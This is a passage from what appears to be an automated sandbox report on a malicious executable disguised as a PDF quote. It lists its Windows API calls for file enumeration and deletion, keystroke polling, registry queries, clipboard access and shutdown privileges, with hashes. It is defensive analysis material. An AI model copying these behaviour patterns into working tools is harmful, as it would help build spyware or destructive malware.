                                                                      • Part of subcall function 00EC43C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EC43E1
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00ECF1FA
                                                                    • FindClose.KERNEL32(00000000), ref: 00ECF205
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00ECF221
                                                                    • _wcscmp.LIBCMT ref: 00ECF248
                                                                    • _wcscmp.LIBCMT ref: 00ECF25F
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00ECF271
                                                                    • SetCurrentDirectoryW.KERNEL32(00F18920), ref: 00ECF28F
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ECF299
                                                                    • FindClose.KERNEL32(00000000), ref: 00ECF2A6
                                                                    • FindClose.KERNEL32(00000000), ref: 00ECF2B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 1824444939-438819550
                                                                    • Opcode ID: 1fd6fa88ee1f86bc7d0751460f65657d7e6717f5a08878d1a3164236fe3b75fa
                                                                    • Instruction ID: 3ed7b0298917c2fa4aacd4d44c58e8810e602fffb11cc802eb2fbca06e9bd640
                                                                    • Opcode Fuzzy Hash: 1fd6fa88ee1f86bc7d0751460f65657d7e6717f5a08878d1a3164236fe3b75fa
                                                                    • Instruction Fuzzy Hash: 9531123650025D6ECB14ABA5DD88FDE73AE9F48364F101179F804B21B0DB32DE8BCA54
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00ECA299
                                                                    • __swprintf.LIBCMT ref: 00ECA2BB
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00ECA2F8
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00ECA31D
                                                                    • _memset.LIBCMT ref: 00ECA33C
                                                                    • _wcsncpy.LIBCMT ref: 00ECA378
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00ECA3AD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00ECA3B8
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00ECA3C1
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00ECA3CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 2733774712-3457252023
                                                                    • Opcode ID: 797b08f22582cafce730daebed69e836010bbde9673fe142879cc6456f1d6f4b
                                                                    • Instruction ID: 0ddef2083d7e3c37b8581b0c7c6bb4b9b98c86be3e846625d502f2d84a92ac26
                                                                    • Opcode Fuzzy Hash: 797b08f22582cafce730daebed69e836010bbde9673fe142879cc6456f1d6f4b
                                                                    • Instruction Fuzzy Hash: 7C31BF7190015EABDB209FA4DC49FEF33BCEF88704F1451BAFA08E6160E77196458B25
                                                                    APIs
                                                                      • Part of subcall function 00EB852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EB8546
                                                                      • Part of subcall function 00EB852A: GetLastError.KERNEL32(?,00EB800A,?,?,?), ref: 00EB8550
                                                                      • Part of subcall function 00EB852A: GetProcessHeap.KERNEL32(00000008,?,?,00EB800A,?,?,?), ref: 00EB855F
                                                                      • Part of subcall function 00EB852A: HeapAlloc.KERNEL32(00000000,?,00EB800A,?,?,?), ref: 00EB8566
                                                                      • Part of subcall function 00EB852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EB857D
                                                                      • Part of subcall function 00EB85C7: GetProcessHeap.KERNEL32(00000008,00EB8020,00000000,00000000,?,00EB8020,?), ref: 00EB85D3
                                                                      • Part of subcall function 00EB85C7: HeapAlloc.KERNEL32(00000000,?,00EB8020,?), ref: 00EB85DA
                                                                      • Part of subcall function 00EB85C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EB8020,?), ref: 00EB85EB
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EB8238
                                                                    • _memset.LIBCMT ref: 00EB824D
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EB826C
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00EB827D
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00EB82BA
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EB82D6
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00EB82F3
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EB8302
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00EB8309
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EB832A
                                                                    • CopySid.ADVAPI32(00000000), ref: 00EB8331
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EB8362
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EB8388
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EB839C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                    • String ID:
                                                                    • API String ID: 3996160137-0
                                                                    • Opcode ID: eb26708a40b2148d41fd2c01d1813c2255863576176738ef230c52beb24b6434
                                                                    • Instruction ID: 9a704a2c0548363e315671a58deb28619f61ca191cfa2c8691c7e1e166ddf2e6
                                                                    • Opcode Fuzzy Hash: eb26708a40b2148d41fd2c01d1813c2255863576176738ef230c52beb24b6434
                                                                    • Instruction Fuzzy Hash: 6E61657190020AEFDF10DFA5DD84AEEBBB9FF45704F048129F915BA291DB319A05CBA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)
                                                                    • API String ID: 0-3700951917
                                                                    • Opcode ID: 75d51383479cf0197da46cfd425864b48fed1e758aa1b0be1472ce179ca7736e
                                                                    • Instruction ID: 2f17554b026a3d0548cc0db8d981a441b62600714cac1104569c30bde83dc030
                                                                    • Opcode Fuzzy Hash: 75d51383479cf0197da46cfd425864b48fed1e758aa1b0be1472ce179ca7736e
                                                                    • Instruction Fuzzy Hash: E6727E71E006199BDB24CF59C8507EEB7B5FF44324F5490AAE949FB294EB309E81CB90
                                                                    APIs
                                                                      • Part of subcall function 00EE0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EDFE38,?,?), ref: 00EE0EBC
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EE0537
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EE05D6
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EE066E
                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EE08AD
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EE08BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1240663315-0
                                                                    • Opcode ID: c6d24ad0059befddf352f68f282ae33b0d6755c46c115ee113f9c3b7f3907b7b
                                                                    • Instruction ID: 39f2655a3867fa24d73c56f2103b7077334914b297b1456717e9ae267f24f268
                                                                    • Opcode Fuzzy Hash: c6d24ad0059befddf352f68f282ae33b0d6755c46c115ee113f9c3b7f3907b7b
                                                                    • Instruction Fuzzy Hash: 47E16E31204254AFCB14DF25D891E6BBBE8EF88714F04956DF48AEB262DB30ED45CB51
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00EC0062
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00EC00E3
                                                                    • GetKeyState.USER32(000000A0), ref: 00EC00FE
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00EC0118
                                                                    • GetKeyState.USER32(000000A1), ref: 00EC012D
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00EC0145
                                                                    • GetKeyState.USER32(00000011), ref: 00EC0157
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00EC016F
                                                                    • GetKeyState.USER32(00000012), ref: 00EC0181
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00EC0199
                                                                    • GetKeyState.USER32(0000005B), ref: 00EC01AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 6021f40c47abfc44a4947659ecb0df33439399264d13ff8f1812eb1c1396abba
                                                                    • Instruction ID: c709eacf8435728b3c5d9b707795764bc9c09014994e7d81ec771ed5ebfa55a1
                                                                    • Opcode Fuzzy Hash: 6021f40c47abfc44a4947659ecb0df33439399264d13ff8f1812eb1c1396abba
                                                                    • Instruction Fuzzy Hash: BA41E8345057C9EEFF308B608A05BA5FEA0AF21348F0C549DD5C5661C2D7D69EC9C7A2
                                                                    APIs
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                    • CoInitialize.OLE32 ref: 00ED8518
                                                                    • CoUninitialize.OLE32 ref: 00ED8523
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00EF2BEC,?), ref: 00ED8583
                                                                    • IIDFromString.OLE32(?,?), ref: 00ED85F6
                                                                    • VariantInit.OLEAUT32(?), ref: 00ED8690
                                                                    • VariantClear.OLEAUT32(?), ref: 00ED86F1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 834269672-1287834457
                                                                    • Opcode ID: 0a876410401d6d433ec54a8b16729e139d5c88a4938ed2436ff2a33a61eb7eae
                                                                    • Instruction ID: 757cdf007fb5363843079fc8d571b3d7afbd8d573e6b21a46bb3365bf1212f28
                                                                    • Opcode Fuzzy Hash: 0a876410401d6d433ec54a8b16729e139d5c88a4938ed2436ff2a33a61eb7eae
                                                                    • Instruction Fuzzy Hash: 2F6180702083019FC710DF24DA85BAAB7E8EF48754F04585EF995AB391DB70ED4ACB92
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: 177ece316b242493ae646dad92b4388d1bfbd36eb6e5987a63b9eef928b4fb01
                                                                    • Instruction ID: f0744ee82abaff4a9f44d0cc883c7893ddbc6507739a0015713d719e9b43760f
                                                                    • Opcode Fuzzy Hash: 177ece316b242493ae646dad92b4388d1bfbd36eb6e5987a63b9eef928b4fb01
                                                                    • Instruction Fuzzy Hash: 64219C352002159FDB11AFA5EC99B6E77E8EF58710F14902AF946FB2B1DB30AD01CB94
                                                                    APIs
                                                                      • Part of subcall function 00E648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E648A1,?,?,00E637C0,?), ref: 00E648CE
                                                                      • Part of subcall function 00EC4AD8: GetFileAttributesW.KERNEL32(?,00EC374F), ref: 00EC4AD9
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00EC38E7
                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00EC398F
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00EC39A2
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00EC39BF
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EC39E1
                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00EC39FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 4002782344-1173974218
                                                                    • Opcode ID: 5b28ad6e21f370f4c65381e383092e3475363ae878c56ab0ff189c720855b32a
                                                                    • Instruction ID: 7a095faeffb7b49d7c5ee85bfab0733b07e8b67bc4831f61dc8712c3a7162e73
                                                                    • Opcode Fuzzy Hash: 5b28ad6e21f370f4c65381e383092e3475363ae878c56ab0ff189c720855b32a
                                                                    • Instruction Fuzzy Hash: A051913184414C9ECB15EBA0DE92EEDB7B8AF14344F649169E44677091EF326F0ECB60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                                                                    • API String ID: 0-3486589167
                                                                    • Opcode ID: e15bda6198ce870ce2037b6c40e849e3626207149857e5bb2151262ea07c0ea0
                                                                    • Instruction ID: 8f7d7982b8e32c1d599b4928c40acc4df9da2f04e57d7cecd0974d0d3da52a90
                                                                    • Opcode Fuzzy Hash: e15bda6198ce870ce2037b6c40e849e3626207149857e5bb2151262ea07c0ea0
                                                                    • Instruction Fuzzy Hash: 19A271B0E0421ACBDF28CF58C9807EDB7B1BB55318F14D1AAD959BB280D770AE81DB51
                                                                    APIs
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00ECF4CC
                                                                    • Sleep.KERNEL32(0000000A), ref: 00ECF4FC
                                                                    • _wcscmp.LIBCMT ref: 00ECF510
                                                                    • _wcscmp.LIBCMT ref: 00ECF52B
                                                                    • FindNextFileW.KERNEL32(?,?), ref: 00ECF5C9
                                                                    • FindClose.KERNEL32(00000000), ref: 00ECF5DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                    • String ID: *.*
                                                                    • API String ID: 713712311-438819550
                                                                    • Opcode ID: 138327cda2ffd2a1a9d059b2cdae939e6ffea2627e0722cceef69e8847aa9df8
                                                                    • Instruction ID: e71bf73d4f984d10724d03bb3c5b0c7eb7949c65d6e89731168614b56906fe4f
                                                                    • Opcode Fuzzy Hash: 138327cda2ffd2a1a9d059b2cdae939e6ffea2627e0722cceef69e8847aa9df8
                                                                    • Instruction Fuzzy Hash: 61419E7190020AAFCF10DFA4CD84EEEBBB5FF04354F14516AE919B62A1EB329E45CB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 73e061561168bc51dc7e5067a919b8c7feec3a82b7b665cb5d0ab90eacf8e0e2
                                                                    • Instruction ID: df67a11e9be0b26ecf0f11c73519afae79230cde82cadc9b4899c9bde0c596a9
                                                                    • Opcode Fuzzy Hash: 73e061561168bc51dc7e5067a919b8c7feec3a82b7b665cb5d0ab90eacf8e0e2
                                                                    • Instruction Fuzzy Hash: D012A771A00609DFDF14DFA4D981AEEB7F5FF88304F109669E44AB7250EB36AA11CB50
                                                                    APIs
                                                                      • Part of subcall function 00E80F36: std::exception::exception.LIBCMT ref: 00E80F6C
                                                                      • Part of subcall function 00E80F36: __CxxThrowException@8.LIBCMT ref: 00E80F81
                                                                    • _memmove.LIBCMT ref: 00EB05AE
                                                                    • _memmove.LIBCMT ref: 00EB06C3
                                                                    • _memmove.LIBCMT ref: 00EB076A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                    • String ID: yZ
                                                                    • API String ID: 1300846289-3798167742
                                                                    • Opcode ID: 12901478a40c0d82ecbddfbadc2005df9ce03f671ed491bd2bfec80da96c3ef5
                                                                    • Instruction ID: e016b838b239257447f40f23ba2a8a1923e412b9ab3b0717f5e751d937eeac70
                                                                    • Opcode Fuzzy Hash: 12901478a40c0d82ecbddfbadc2005df9ce03f671ed491bd2bfec80da96c3ef5
                                                                    • Instruction Fuzzy Hash: 2F02BFB1A00209DFDF18DF64D981AAFBBF5EF44300F14D069E80AEB255EB31A911CB91
                                                                    APIs
                                                                      • Part of subcall function 00EB8AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EB8AED
                                                                      • Part of subcall function 00EB8AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EB8B1A
                                                                      • Part of subcall function 00EB8AA3: GetLastError.KERNEL32 ref: 00EB8B27
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00EC52A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-194228
                                                                    • Opcode ID: 3663c6357658eac49d28894a9cd433b69dcf5bc3f26538e37e837ba0b1607ca7
                                                                    • Instruction ID: 10bd17fd81989b3bb8d03735d681e9dab9a6e9d94b48cb21e3baff97f82a63f9
                                                                    • Opcode Fuzzy Hash: 3663c6357658eac49d28894a9cd433b69dcf5bc3f26538e37e837ba0b1607ca7
                                                                    • Instruction Fuzzy Hash: 810128336906155EF72C22689E4BFF672E8DB05341F201129F807F10F2D9527C428590
                                                                    Strings
                                                                    Memory Dump Source
